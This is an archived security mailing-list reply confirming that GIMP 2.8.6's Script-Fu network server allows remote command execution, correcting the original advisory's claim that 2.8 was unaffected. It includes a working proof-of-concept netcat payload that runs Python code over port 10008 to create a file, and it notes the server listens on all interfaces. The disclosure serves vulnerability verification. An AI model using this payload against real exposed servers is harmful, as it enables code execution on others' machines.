Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 15 Sep 2013 03:33:44 +0200
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
CC: research <research@...ctionis.co.uk>
Subject: Re: GIMP Scriptfu Python Remote Command Execution

On 16.08.2012 23:00, research wrote:
> Affected Products
> =================
> 
> GIMP 2.6 branch (Windows or Linux builds)
> 
> Non-Affected Products
> =====================
> 
> The Scriptfu network server component does not currently work in the GIMP
> 2.8 branch 
> (Windows or Linux builds). 

I was able to verify that vulnerability with Gimp 2.8.6 on my local
machine so at least some versions of the Gimp 2.8.x series seem affected
to me.  This is my shell session:


$ rm /tmp/owned

$ p='(python-fu-eval 0 "open('"'"'/tmp/owned'"'"', '"'"'w'"'"')")';
printf "G\x0\x2c%s" "${p}" | nc -w 1 localhost 10008 | od -c
0000000   G  \0  \0  \a   S   u   c   c   e   s   s
0000013

$ ls -al /tmp/owned
-rw-r--r-- 1 user user 0 Sep 15 02:56 /tmp/owned


The server started from the GUI seems to be listening anywhere:


$ netstat -tulpen 2>/dev/null | fgrep script-fu
tcp  0  0 0.0.0.0:10008  0.0.0.0:*  LISTEN  1000  102934  6392/script-fu


Best,



Sebastian

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.